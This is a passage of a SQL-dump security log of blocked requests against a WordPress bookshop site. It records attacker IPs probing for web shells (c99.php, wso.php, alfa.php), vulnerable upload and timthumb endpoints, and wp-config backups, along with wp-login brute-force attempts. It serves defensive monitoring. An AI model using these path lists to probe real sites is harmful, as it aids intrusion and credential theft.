,1638348389.5354,55,'lfDTgvwQNsIiMzC2a6motxky','','19|0|0|0|ashbooks.co.uk/doc.php'),('34.122.91.192',578444224,'',0,1638348390.7441,55,'YBMJwqmaE1nkOZzC9b58FNSx','','19|0|0|0|ashbooks.co.uk/alwso.php'),('34.122.91.192',578444224,'',0,1638348394.2828,55,'RyPteMHCvfkXS8KhAEFs10L4','','19|0|0|0|ashbooks.co.uk/fa.php'),('34.122.91.192',578444224,'',0,1638348396.5358,55,'cZbYBOlHCp0QzsE7GriNXade','','19|0|0|0|ashbooks.co.uk/3.php'),('34.122.91.192',578444224,'',0,1638348399.3390,55,'S1DJ5tBzg0An3fjlchYGQ4xk','','19|0|0|0|ashbooks.co.uk/alexus-mailer.php'),('34.122.91.192',578444224,'',0,1638348401.5252,55,'nMqSBzR1mJvpYte0Q4wHyZCi','','19|0|0|0|ashbooks.co.uk/wp-content/includes/uploads/Va.php'),('34.122.91.192',578444224,'',0,1638348403.5220,55,'IWsSQbCNeRjZpVKPLJ3gwxrk','','19|0|0|0|ashbooks.co.uk/wp-content/uploads/readindex.php'),('34.122.91.192',578444224,'',0,1638348404.9924,55,'N6RVJjv5wd23soyTChcqGeL4','','19|0|0|0|ashbooks.co.uk/wp-content/uploads/small.php'),('34.122.91.192',578444224,'',0,1638348406.2680,55,'zqJWoLB1xG9MnOmwahbZR7t6','','19|0|0|0|ashbooks.co.uk/wp-admin/includes/mar.php'),('34.122.91.192',578444224,'',0,1638348408.2711,55,'2TO3sBu1o7lRVAm0LZPdhkQ5','','19|0|0|0|ashbooks.co.uk/wp-admin/includes/readindex.php'),('34.122.91.192',578444224,'',0,1638348409.0248,55,'Y02Jspca5BCdtlWyMbjP1onq','','19|0|0|0|ashbooks.co.uk/wp-admin/includes/maint/wp-readindex.php'),('34.122.91.192',578444224,'',0,1638348411.5438,55,'txskCeVTjbQgLNOJoiR8HZp7','','19|0|0|0|ashbooks.co.uk/wp-admin/includes/maint/wp-cron.php'),('34.122.91.192',578444224,'',0,1638348416.2002,55,'MN1xfu9ImJ0AQ4ChrPS8bFDT','','19|0|0|0|ashbooks.co.uk/wp-admin/includes/media-site.php'),('34.122.91.192',578444224,'',0,1638348417.7597,55,'SlhTJxgDRKmafe18qiztIWjk','','19|0|0|0|ashbooks.co.uk/wp-admin/includes/class-wp-media-list-data.php'),('34.122.91.192',578444224,'',0,1638348419.8257,55,'I914BUThfsrnLvARV8P5KyYm','','19|0|0|0|ashbooks.co.uk/wp-admin/includes/maint/repair-bak.php'),('34.122.91.192',578444224,'',0,1638348421.4838,55,'SlrGiEDCc9MqBtnpXPgVIwRo','','19|0|0|0|ashbooks.co.uk/wp-admin/includes/edit-tag-menu.php'),('34.122.91.192',578444224,'',0,1638348424.0414,55,'MRp2ETmgKrHYdnbeLIJoxNc6','','19|0|0|0|ashbooks.co.uk/wp-admin/includes/tablepress_controllers.php'),('34.122.91.192',578444224,'',0,1638348427.7545,55,'fRCq1pk9SFE4awiWH5nJTxbZ','','19|0|0|0|ashbooks.co.uk/wp-admin/includes/block-line.php'),('34.122.91.192',578444224,'',0,1638348433.4148,55,'Ruj2k3N0mgtHwbirL47oFeMT','','19|0|0|0|ashbooks.co.uk/wp-admin/css/modern/colors.css.php'),('34.122.91.192',578444224,'',0,1638348437.9054,55,'p3mo0SUQLfwFIAOerRT1h8Bt','','19|0|0|0|ashbooks.co.uk/wp-includes/sys.php'),('5.188.62.140',96222860,'ashbooks',0,1638348739.5366,51,'uq7X2f1tAe9SKML8Nn3Bhasx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('199.249.230.158',3355043486,'ashbooks',0,1638355720.6825,51,'ujOiz6RBgleQFwtZ80Nqon1v','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.217.110',1159649646,'admin',0,1638357155.7100,7,'zZgUFHuqTJmsxO20AMS98I4W','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('20.74.148.83',340431955,'',0,1638357476.0454,70,'eiLAH5SKudwRmx63z2N8osEl','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('82.223.55.111',1390360431,'admin',0,1638363509.0845,7,'7vgopePTCO1qi8kJAQyw0Sj4','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.231.155',1159653275,'admin',0,1638364353.0151,7,'c1V4QjKornGXg8zMOpHb6kwq','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('185.103.199.199',3110586311,'',0,1638365677.8190,55,'ogcHTCAJtVezUYbrKF6MuDEw','','19|0|0|0|ashbooks.co.uk/accesson.php'),('23.228.109.147',400846227,'',0,1638373117.8253,55,'qfPGzXgmhkspKTMxSeQWvOAJ','','19|0|0|0|ashbooks.co.uk/php-ofc-library/ofc_upload_image.php'),('185.191.34.215',3116311255,'',0,1638375887.0042,55,'6wNhxvt0jWTyqHpuoB12DZMG','','19|0|0|0|ashbooks.co.uk/s_e.php'),('197.207.173.224',3318722016,'',0,1638376403.9444,55,'3biWE285wUmVLnNcCyq7duM6','','19|0|0|0|ashbooks.co.uk/Lux.php'),('197.207.173.224',3318722016,'',0,1638376404.4825,55,'YpBUoxWVOsG54fuCdNEjtybw','','19|0|0|0|ashbooks.co.uk/kk.php'),('197.207.173.224',3318722016,'',0,1638376404.7319,55,'pCuVnrPvfiJ0ILqDHyYNBG51','','19|0|0|0|ashbooks.co.uk/aa.php'),('197.207.173.224',3318722016,'',0,1638376405.8045,55,'yhO80Ff3V2bcmnJKug9eIXQl','','19|0|0|0|ashbooks.co.uk/matricule.php'),('197.207.173.224',3318722016,'',0,1638376406.0433,55,'Hz1xBr27AgJLPwfsqTElYMhI','','19|0|0|0|ashbooks.co.uk/shell4.php'),('197.207.173.224',3318722016,'',0,1638376406.0761,10,'Hz1xBr27AgJLPwfsqTElYMhI','','707|0|0|0|ashbooks.co.uk/shell4.php'),('197.207.173.224',3318722016,'',0,1638376406.6463,55,'nPt6TwzDcYaGNjp19BJU4Hei','','19|0|0|0|ashbooks.co.uk/ups.php'),('197.207.173.224',3318722016,'',0,1638376406.9547,55,'Cl23EO4gSJmY1z7AwKbrpFi6','','19|0|0|0|ashbooks.co.uk/ru.php'),('197.207.173.224',3318722016,'',0,1638376407.4568,55,'SuY4I9JqB3OCpGDhX6rcNlzv','','19|0|0|0|ashbooks.co.uk/if.php'),('197.207.173.224',3318722016,'',0,1638376407.6967,55,'SwICYBZKnaFQmRDqE9j034Xo','','19|0|0|0|ashbooks.co.uk/vuln.php'),('197.207.173.224',3318722016,'',0,1638376407.9262,55,'jGuYMR8T0q9ZwAx34yaHhIrN','','19|0|0|0|ashbooks.co.uk/fw.php'),('197.207.173.224',3318722016,'',0,1638376408.3961,55,'Q6yBRItihsu4U0bnO5kTaxY9','','19|0|0|0|ashbooks.co.uk/skipper.php'),('197.207.173.224',3318722016,'',0,1638376408.6244,55,'LgNX89KsEHofjnOQ3d2zvtwF','','19|0|0|0|ashbooks.co.uk/skippershell.php'),('197.207.173.224',3318722016,'',0,1638376408.8648,55,'cG4hFmN9TxyQjl2pobCEL0i3','','19|0|0|0|ashbooks.co.uk/tttt.php'),('197.207.173.224',3318722016,'',0,1638376409.4010,55,'xClIcPzs9raXwtub2qBKE37F','','19|0|0|0|ashbooks.co.uk/tshop.php'),('197.207.173.224',3318722016,'',0,1638376409.6515,55,'nD9xjwT5Ao6UqHRkGJEyPavi','','19|0|0|0|ashbooks.co.uk/alfa.php'),('197.207.173.224',3318722016,'',0,1638376409.9176,55,'Q45v8szX76ZRboaVGDyEwuS2','','19|0|0|0|ashbooks.co.uk/shell.php'),('197.207.173.224',3318722016,'',0,1638376410.4894,55,'HSU3PtG75g6zfLEic9WJNXlu','','19|0|0|0|ashbooks.co.uk/inje3ctor.php'),('197.207.173.224',3318722016,'',0,1638376410.7655,55,'BiW9lOHsJ0T1rQ7aVPYyLCZw','','19|0|0|0|ashbooks.co.uk/saudi.php'),('197.207.173.224',3318722016,'',0,1638376411.0547,55,'wQXmMZxYy1Ata5d9v3qK8kcL','','19|0|0|0|ashbooks.co.uk/wso.php'),('197.207.173.224',3318722016,'',0,1638376411.6095,55,'1Giruq8xTWNaVJZQElb0vhSf','','19|0|0|0|ashbooks.co.uk/alfashell.php'),('197.207.173.224',3318722016,'',0,1638376411.9232,55,'7ZNYnb9sJ2mwrqU60VkOC4fa','','19|0|0|0|ashbooks.co.uk/my_alfa.php'),('197.207.173.224',3318722016,'',0,1638376412.4995,55,'iugYZt0k6bySAFPjxfB5wdEG','','19|0|0|0|ashbooks.co.uk/uploader.php'),('197.207.173.224',3318722016,'',0,1638376412.7445,55,'hO6mfEAGsDdpVS9yvL450Jc2','','19|0|0|0|ashbooks.co.uk/up.php'),('197.207.173.224',3318722016,'',0,1638376412.9786,55,'hcJ2rjvgTUp0eVyfA4sDzSdo','','19|0|0|0|ashbooks.co.uk/hacked.php'),('197.207.173.224',3318722016,'',0,1638376413.5109,55,'7NV32fonrRbqdeF5WIxtXJCY','','19|0|0|0|ashbooks.co.uk/c99.php'),('197.207.173.224',3318722016,'',0,1638376413.7665,55,'8JlSUf15agpNXsqrTIG2n0we','','19|0|0|0|ashbooks.co.uk/priv8.php'),('197.207.173.224',3318722016,'',0,1638376413.9961,55,'ZWXGEOF6ATdN51lSuQLb70fh','','19|0|0|0|ashbooks.co.uk/Navir.php'),('197.207.173.224',3318722016,'',0,1638376414.5121,55,'bYxLdiB0WpetQqovDXwE1m96','','19|0|0|0|ashbooks.co.uk/cmd13.php'),('197.207.173.224',3318722016,'',0,1638376414.7733,55,'tM2Y6DfF90i57xR4grEZlwsX','','19|0|0|0|ashbooks.co.uk/inc20k1.php'),('197.207.173.224',3318722016,'',0,1638376415.4550,55,'kVoNI8OhK6z9cXbfaQZpAMeB','','19|0|0|0|ashbooks.co.uk/404.php'),('197.207.173.224',3318722016,'',0,1638376416.4319,55,'aJkmsS1W7jT4pPzhFeDBHIgZ','','19|0|0|0|ashbooks.co.uk/swm.php'),('197.207.173.224',3318722016,'',0,1638376416.7014,55,'oJ46bfgUlOF3v0VWKNcHCRzI','','19|0|0|0|ashbooks.co.uk/wp.php'),('197.207.173.224',3318722016,'',0,1638376416.9734,55,'oX0vJI7std3lDNZPu2OVqwQL','','19|0|0|0|ashbooks.co.uk/doc.php'),('197.207.173.224',3318722016,'',0,1638376417.5206,55,'DcinQLwPYCeHKIkbjq3dWTg8','','19|0|0|0|ashbooks.co.uk/shx.php'),('197.207.173.224',3318722016,'',0,1638376417.7923,55,'YU4j9rMl7fy16CzSOsbtmoaB','','19|0|0|0|ashbooks.co.uk/ws.php'),('197.207.173.224',3318722016,'',0,1638376418.3163,55,'qG1wWyta5hoIsD7Y2RxPujAO','','19|0|0|0|ashbooks.co.uk/m.php'),('197.207.173.224',3318722016,'',0,1638376418.5675,55,'ewaEU7WS65TO4cimk0CVLhYB','','19|0|0|0|ashbooks.co.uk/edit-form.php'),('197.207.173.224',3318722016,'',0,1638376418.8035,55,'QifRGoxtcg0KbAWdhyejw17I','','19|0|0|0|ashbooks.co.uk/1index.php'),('197.207.173.224',3318722016,'',0,1638376419.0298,55,'5tRdIcZYjbeGzJDkPgxHFoVs','','19|0|0|0|ashbooks.co.uk/utchiha.php'),('197.207.173.224',3318722016,'',0,1638376419.4829,55,'wkLGsghXSCdiWAlf7vYRJZ02','','19|0|0|0|ashbooks.co.uk/finder.php'),('197.207.173.224',3318722016,'',0,1638376419.7134,55,'DJQmxY8qE4PIS9eLGHB6n7wh','','19|0|0|0|ashbooks.co.uk/wp.php'),('197.207.173.224',3318722016,'',0,1638376419.9490,55,'beQWqgrG1J0NmC2a9XMhVYHs','','19|0|0|0|ashbooks.co.uk/green.php'),('197.207.173.224',3318722016,'',0,1638376420.4017,55,'g7naPNISzkVpYds4oWH1J5lc','','19|0|0|0|ashbooks.co.uk/a.php'),('197.207.173.224',3318722016,'',0,1638376420.6279,55,'nwkYmsT2PS5RHegF8b1J9hNI','','19|0|0|0|ashbooks.co.uk/asap.php'),('197.207.173.224',3318722016,'',0,1638376420.8776,55,'Jvm0Gj2PxKMy5X4CfhIopHWV','','19|0|0|0|ashbooks.co.uk/ayoub.php'),('102.154.13.217',1721372121,'',0,1638377276.2188,70,'4PNwLpRrAEi1hzCXubUBxVvO','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('197.2.127.246',3305275382,'ashbooks',0,1638380362.4635,51,'la3S1OrAdxLYu9kp72EftoBQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'ashbooks',0,1638380392.1825,51,'qiH6aGty5OzDTmjnxNQ9R8EK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('105.189.21.216',1773999576,'',0,1638380399.6548,55,'0Xn4TmUY6fjuky9szgxG2I1R','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'),('105.189.21.216',1773999576,'',0,1638380409.9410,55,'Li4OhRM3yCeHGkIxlDzbpwZK','','19|0|0|0|ashbooks.co.uk/modules/mod_dvfoldercontent/download.php'),('105.189.21.216',1773999576,'',0,1638380410.9892,55,'oCXAg8xW2lbKFtGBdEaSRpki','','19|0|0|0|ashbooks.co.uk/plugins/content/jw_allvideos/includes/download.php'),('105.189.21.216',1773999576,'',0,1638380414.9075,55,'9EhHeuKnWTtFBs8x2ZkJy5Nz','','19|0|0|0|ashbooks.co.uk/components/com_contushdvideoshare/hdflvplayer/download.php'),('105.189.21.216',1773999576,'',0,1638380417.3173,55,'RPM3xhY7Jdm0jKA4GrqOHu91','','19|0|0|0|ashbooks.co.uk/administrator/components/com_aceftp/quixplorer/index.php'),('105.189.21.216',1773999576,'',0,1638380417.3724,10,'RPM3xhY7Jdm0jKA4GrqOHu91','','707|0|0|0|ashbooks.co.uk/administrator/components/com_aceftp/quixplorer/index.php'),('105.189.21.216',1773999576,'',0,1638380418.3309,100,'0C9tVra6mvEuJSX4idfqULyg','','13|0|0|0|ashbooks.co.uk/plugins/content/s5_media_player/helper.php'),('105.189.21.216',1773999576,'',0,1638380419.4035,100,'qO1tFmZjuJWalfADeXKQUPLy','','13|0|0|0|ashbooks.co.uk/index.php'),('105.189.21.216',1773999576,'',0,1638380421.1815,100,'jBEthnAGMm7fQ45c9X6r8Jp3','','13|0|0|0|ashbooks.co.uk/index.php'),('105.189.21.216',1773999576,'',0,1638380422.1189,55,'Q7W0BrYKe4zCfM1k63Dq5uJy','','19|0|0|0|ashbooks.co.uk/components/com_creativecontactform/fileupload/index.php'),('105.189.21.216',1773999576,'',0,1638380424.9388,55,'KmRQndc5e2BkAyHw0rTta1P9','','19|0|0|0|ashbooks.co.uk/doajaxfileupload.php'),('105.189.21.216',1773999576,'',0,1638380426.0837,55,'PWyBmSIQ1iwsK6v7UZAXaoGH','','19|0|0|0|ashbooks.co.uk/upload.php'),('105.189.21.216',1773999576,'',0,1638380427.3763,55,'wWK5n3vRXSdCyiNM9hbAfJe1','','19|0|0|0|ashbooks.co.uk/ajaxupload.php'),('197.2.127.246',3305275382,'ashbooks',0,1638380428.4315,51,'ehuaW18APTtmpSGx4BnKVqOf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('105.189.21.216',1773999576,'',0,1638380431.1656,55,'bTxcLAi8HBf6SdlaWmrokJyK','','19|0|0|0|ashbooks.co.uk/wp-content/themes/ninetofive/scripts/doajaxfileupload.php'),('105.189.21.216',1773999576,'',0,1638380447.6906,55,'FHzEZeRO3vQ7frJ5XcICWpYh','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/user-meta/framework/helper/uploader.php'),('105.189.21.216',1773999576,'',0,1638380448.6679,100,'ZBQv3arV6lbLtm5DY1sFUqpX','','13|0|0|0|ashbooks.co.uk/surveys.php'),('105.189.21.216',1773999576,'',0,1638380450.5203,100,'UtZwqDmETxk6QNBz0pMIXKhV','','13|0|0|0|ashbooks.co.uk/index.php'),('105.189.21.216',1773999576,'',0,1638380452.6676,55,'h0bZwYSLOVBetya2GEj7Fv63','','19|0|0|0|ashbooks.co.uk/wp-content/themes/switchblade/framework/_scripts/valums_uploader/php.php'),('105.189.21.216',1773999576,'',0,1638380454.8314,55,'1I4GiY7Brx2tTa9qKNjsbhWM','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/flipbook/php.php'),('105.189.21.216',1773999576,'',0,1638380456.1113,55,'OoTsKI3dvl9PjhNCB805LYmn','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/evarisk/include/lib/actionsCorrectives/activite/uploadPhotoApres.php'),('105.189.21.216',1773999576,'',0,1638380458.0793,55,'jveHDKOFGS0sNUaPX4AB3hCi','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/gallery-plugin/upload/php.php'),('105.189.21.216',1773999576,'',0,1638380459.4160,55,'18InPF67VExlz5uWqthLH4CY','','19|0|0|0|ashbooks.co.uk/wp-content/themes/lightspeed/functions/jwpanel/scripts/valums_uploader/php.php'),('197.2.127.246',3305275382,'ashbooks',0,1638380460.3804,51,'uePd8KiRqvBfjzlh5MHxtmg1','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('105.189.21.216',1773999576,'',0,1638380460.5813,55,'DGWwIKEueQBJS3kPmoZTq0hR','','19|0|0|0|ashbooks.co.uk/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php'),('105.189.21.216',1773999576,'',0,1638380461.8452,55,'jpTHZQC4Ne6U2uGhzoFx9gml','','19|0|0|0|ashbooks.co.uk/getsimple/plugins/items/uploader/server/php.php'),('105.189.21.216',1773999576,'',0,1638380462.8936,55,'SPkOyBa1EmDVsRhHCGX2I3ZW','','19|0|0|0|ashbooks.co.uk/novi/admin/engine/lib/valums/server/php.php'),('105.189.21.216',1773999576,'',0,1638380463.8613,55,'oY9uS7jrCQFqtdMA85caRPT1','','19|0|0|0|ashbooks.co.uk/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php'),('105.189.21.216',1773999576,'',0,1638380467.9061,100,'538mO7gMpTdCnYJXhlLuAvix','','13|0|0|0|ashbooks.co.uk/modules/hdi/hdi-tinymce/tiny_mce4/plugins/moxiemanager/api.php'),('105.189.21.216',1773999576,'',0,1638380468.8304,100,'kqOXboGMapIsU5w017tP9hBl','','13|0|0|0|ashbooks.co.uk/index.php'),('105.189.21.216',1773999576,'',0,1638380471.5052,50,'RAmsfd7869CPVLpYZgJ5tNab','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('105.189.21.216',1773999576,'',0,1638380472.5816,55,'LMJa2uA1DB5Pw3m4oeypjfYs','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php'),('105.189.21.216',1773999576,'',0,1638380473.5889,55,'iRHw9GAnspULKej3aPfYXzZS','','19|0|0|0|ashbooks.co.uk/js/swfupload/js/upload.php'),('105.189.21.216',1773999576,'',0,1638380475.0904,55,'aqUfx8mQcWAY2TKMzuBhn7V6','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/dreamworkgallery/js/swfupload/js/upload.php'),('105.189.21.216',1773999576,'',0,1638380475.7926,100,'eTkfyXc23EI5wohAVg1Bis6K','','13|0|0|0|ashbooks.co.uk/index.php'),('105.189.21.216',1773999576,'',0,1638380476.7060,55,'43DhlFjdKpikYvsxucWJ9rTn','','19|0|0|0|ashbooks.co.uk/wp-content/themes/newspro/timthumb.php'),('105.189.21.216',1773999576,'',0,1638380477.6972,55,'YOvgFhf3XyACmZzNiL8kxwa7','','19|0|0|0|ashbooks.co.uk/admin/timthumb.php'),('105.189.21.216',1773999576,'',0,1638380478.8613,100,'1NoO6YLsagMy4Z7pjfEenHzA','','13|0|0|0|ashbooks.co.uk/index.php'),('105.189.21.216',1773999576,'',0,1638380479.9262,55,'W3c5rgFvNd6YtGpQjhw1bknO','','19|0|0|0|ashbooks.co.uk/include/swf_upload.php'),('105.189.21.216',1773999576,'',0,1638380482.5086,50,'unoFdmPwhyjG2I6kbZrzJAi8','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('105.189.21.216',1773999576,'',0,1638380483.6015,100,'Yu6XjFawmtoR4cnVGs51JIbZ','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/sell-downloads/sell-downloads.php'),('105.189.21.216',1773999576,'',0,1638380484.6135,100,'DHho5jOyvSb0nmfkRzpu2c3Y','','13|0|0|0|ashbooks.co.uk/wp-content/themes/antioch/lib/scripts/download.php'),('105.189.21.216',1773999576,'',0,1638380486.6711,55,'q7xVPyw98mNQcXdSu2naZpjG','','19|0|0|0|ashbooks.co.uk/wp-config.php.bak'),('105.189.21.216',1773999576,'',0,1638380488.8006,100,'JgcECD2IaXAY1QswqVoBGxkm','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php'),('105.189.21.216',1773999576,'',0,1638380491.6554,55,'o1E205HMhNgXZvfWe6LTyibp','','19|0|0|0|ashbooks.co.uk/include/config.php.bak'),('105.189.21.216',1773999576,'',0,1638380492.5535,55,'VGRvhY3jMHB2OCNdsP94kaqg','','19|0|0|0|ashbooks.co.uk/wp-config.php.000'),('105.189.21.216',1773999576,'',0,1638380493.4800,55,'UTme8sxXF0uMzZDdf2KG9JbE','','19|0|0|0|ashbooks.co.uk/include/config.php.000'),('105.189.21.216',1773999576,'',0,1638380494.4068,55,'mfpQVoLwqzYglRe95xTdWJ1A','','19|0|0|0|ashbooks.co.uk/templates/default/jQuery-File-Upload/server/php/index.php'),('197.2.127.246',3305275382,'ashbooks',0,1638380494.7866,51,'qUzyL4f1atXM3pv52kNAihZE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638380494.7941,10,'qUzyL4f1atXM3pv52kNAihZE','','701|0|0|0|ashbooks.co.uk/wp-login.php'),('105.189.21.216',1773999576,'',0,1638380495.0394,55,'NfpaqOXVl21iEAQegukwBG8L','','19|0|0|0|ashbooks.co.uk/upload.php'),('105.189.21.216',1773999576,'',0,1638380495.8756,55,'SZ5YBfqdkGVet4WAKHjDTu7U','','19|0|0|0|ashbooks.co.uk/theme/plugins/jquery-file-upload/server/php/index.php'),('105.189.21.216',1773999576,'',0,1638380496.6832,55,'fUD0Ra7SWcdVtsY5g2CGh1Mb','','19|0|0|0|ashbooks.co.uk/public/theme/server/fileupload/index.php'),('105.189.21.216',1773999576,'',0,1638380497.6608,55,'t21e06IvUT9ViNHLf3pBWy7K','','19|0|0|0|ashbooks.co.uk/assets/js/bluimp/server/php/index.php'),('105.189.21.216',1773999576,'',0,1638380503.5359,55,'7L0QOFhRf5nyIX6Buz2Aa9Hx','','19|0|0|0|ashbooks.co.uk/wp-contacts.php'),('105.189.21.216',1773999576,'',0,1638380504.4964,55,'QVrypMuHOAS5jfWvIhPL0Uci','','19|0|0|0|ashbooks.co.uk/address.php'),('105.189.21.216',1773999576,'',0,1638380506.2569,55,'lRbhzQLSIuO3XMxVAYEWdtN0','','19|0|0|0|ashbooks.co.uk/cmd.php'),('105.189.21.216',1773999576,'',0,1638380507.3116,55,'ND8XLf4egsbqhxK9mwHSP0VT','','19|0|0|0|ashbooks.co.uk/options.php'),('105.189.21.216',1773999576,'',0,1638380508.1839,100,'ktTVP2J7cZqEdGgyoQCHxzm4','','13|0|0|0|ashbooks.co.uk/wp-content/themes/churchope/lib/downloadlink.php'),('105.189.21.216',1773999576,'',0,1638380509.0777,55,'hr2XHpiclbqDg98eN54mYB1A','','19|0|0|0|ashbooks.co.uk/phpminiadmin.php'),('105.189.21.216',1773999576,'',0,1638380509.8241,55,'r7Ijng9KAZ6sU4RMibL3xQSt','','19|0|0|0|ashbooks.co.uk/plugins/jquery-file-upload/server/php/index.php'),('105.189.21.216',1773999576,'',0,1638380512.3289,55,'xXkKD9M2RtYn4Op0eN7BSzWl','','19|0|0|0|ashbooks.co.uk/admin/jQuery-File-Upload/server/php/index.php'),('105.189.21.216',1773999576,'',0,1638380514.0619,55,'5mg07luM4XhkxKCHPNWpSGye','','19|0|0|0|ashbooks.co.uk/assets/plugins/jQuery-File-Upload/server/php/index.php'),('105.189.21.216',1773999576,'',0,1638380514.9178,55,'zoWIQu7aOSVjMPtAcebF0ldK','','19|0|0|0|ashbooks.co.uk/assets/admin/plugins/jQuery-File-Upload/server/php/index.php'),('105.189.21.216',1773999576,'',0,1638380515.6753,55,'MaE8meupqzUQKHcrVBJRLb0G','','19|0|0|0|ashbooks.co.uk/assets/global/plugins/jQuery-File-Upload/server/php/index.php'),('105.189.21.216',1773999576,'',0,1638380516.7431,55,'rnvWhj8BRHzeLgV0YCIGyq1o','','19|0|0|0|ashbooks.co.uk/assets/global/plugins/File-Upload/server/php/index.php'),('105.189.21.216',1773999576,'',0,1638380519.3791,55,'8hHqEfCbP5KykD0G7tdnioNI','','19|0|0|0|ashbooks.co.uk/server/php/index.php'),('105.189.21.216',1773999576,'',0,1638380520.4041,55,'o34BMqVudJ91PmSA0ZjI8Wie','','19|0|0|0|ashbooks.co.uk/File-Upload/server/php/index.php'),('105.189.21.216',1773999576,'',0,1638380523.5147,55,'mEHDa3viOK1LyQnFAMPJzkdc','','19|0|0|0|ashbooks.co.uk/thumb.php'),('105.189.21.216',1773999576,'',0,1638380525.4766,55,'d7gJF6KOh3HRITSEG5r4mjD8','','19|0|0|0|ashbooks.co.uk/tt.php'),('105.189.21.216',1773999576,'',0,1638380526.3853,55,'gTF58iVI16ZBMuHPxhRfr0Un','','19|0|0|0|ashbooks.co.uk/TimThumb.php'),('105.189.21.216',1773999576,'',0,1638380527.4356,55,'b4kO7l6xU0dG5t39FWeayXhZ','','19|0|0|0|ashbooks.co.uk/wp-content/themes/bigfeature/library/timthumb/timthumb.php'),('197.2.127.246',3305275382,'',0,1638380527.9609,50,'SlhV3XcgTwjesBbUpHEDunZ9','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('105.189.21.216',1773999576,'',0,1638380528.4079,55,'eoS38bpK6I5fyUJNYRlDxrGk','','19|0|0|0|ashbooks.co.uk/timthumb/timthumb.php'),('105.189.21.216',1773999576,'',0,1638380529.3521,55,'V3I06fEFvNHJXgU52ta1hqrl','','19|0|0|0|ashbooks.co.uk/timthumb.php'),('105.189.21.216',1773999576,'',0,1638380530.8017,55,'9S37uX2YEUWz6cMrlxG0m1hw','','19|0|0|0|ashbooks.co.uk/jQuery-File-Upload/server/php/index.php'),('105.189.21.216',1773999576,'',0,1638380533.3855,55,'CmhGL1NrQaiJsXcwTIxo7uWk','','19|0|0|0|ashbooks.co.uk/kcfinder/css.php'),('105.189.21.216',1773999576,'',0,1638380534.0409,55,'PO5TDGSbmrfHVXzCaMwEyB8h','','19|0|0|0|ashbooks.co.uk/admin/kcfinder/css.php'),('105.189.21.216',1773999576,'',0,1638380534.9841,55,'Hr95tSmQDVhPyRw4Xx2YojlG','','19|0|0|0|ashbooks.co.uk/panel/kcfinder/css.php'),('105.189.21.216',1773999576,'',0,1638380535.7074,55,'jNgCTUHznoE1OAhQr9uLat2f','','19|0|0|0|ashbooks.co.uk/asset/kcfinder/css.php'),('105.189.21.216',1773999576,'',0,1638380536.6284,55,'0tRd8AnjMgTwL59CBGKJFzvq','','19|0|0|0|ashbooks.co.uk/js/kcfinder/css.php'),('105.189.21.216',1773999576,'',0,1638380537.6222,55,'QMv5hZIwtHgJkdoWDLlprGF8','','19|0|0|0|ashbooks.co.uk/administrator/kcfinder/css.php'),('105.189.21.216',1773999576,'',0,1638380538.5528,55,'DAQKp1bqXEksnSuv8NwoM2mc','','19|0|0|0|ashbooks.co.uk/plugins/kcfinder/css.php'),('105.189.21.216',1773999576,'',0,1638380539.6802,55,'HrVADSBceT7wCkJNGf4gnZaL','','19|0|0|0|ashbooks.co.uk/wp-content/themes/versatile/lib/includes/timthumb.php'),('105.189.21.216',1773999576,'',0,1638380540.6521,55,'OmjPEWBGZp4rqzDN70nQkbiy','','19|0|0|0|ashbooks.co.uk/wp-content/themes/bigfeature/library/timthumb/timthumb.php'),('105.189.21.216',1773999576,'',0,1638380541.6067,55,'aqydC076FNxiTJOz4WrZMvIU','','19|0|0|0|ashbooks.co.uk/wp-content/themes/modularity/includes/timthumb.php'),('105.189.21.216',1773999576,'',0,1638380544.1177,55,'teQmXcu8qIafV5h4Z1JMiBls','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-checkout.bk/vendors/timthumb.php'),('105.189.21.216',1773999576,'',0,1638380544.9920,55,'mXQ70gvUBM5pFL4arH2jOZ6x','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-checkout/vendors/timthumb.php'),('105.189.21.216',1773999576,'',0,1638380545.9258,100,'lN2OXmfUbStB9vj3WLIqThe8','','13|0|0|0|ashbooks.co.uk/blog/wp-admin/install.php'),('105.189.21.216',1773999576,'',0,1638380546.9091,100,'ZzyK45vHso6R2w1YqiW3x8gJ','','13|0|0|0|ashbooks.co.uk/wpnew/wp-admin/install.php'),('105.189.21.216',1773999576,'',0,1638380548.3434,100,'Beh16DiuRvYILzrkxmScJ3qG','','13|0|0|0|ashbooks.co.uk/new/wp-admin/install.php'),('105.189.21.216',1773999576,'',0,1638380548.9815,100,'j6IdUQDLw4x9AbpVau1YRvsn','','13|0|0|0|ashbooks.co.uk/newsite/wp-admin/install.php'),('105.189.21.216',1773999576,'',0,1638380549.6929,100,'POuAp6dTjfwEI7x8Kg9bQ3GN','','13|0|0|0|ashbooks.co.uk/wordpress/wp-admin/install.php'),('105.189.21.216',1773999576,'',0,1638380550.5360,100,'KjcASMIi739yRDog6tUdZsBF','','13|0|0|0|ashbooks.co.uk/wp/wp-admin/install.php'),('105.189.21.216',1773999576,'',0,1638380552.4663,100,'jW4xU50s9PzJ2i1c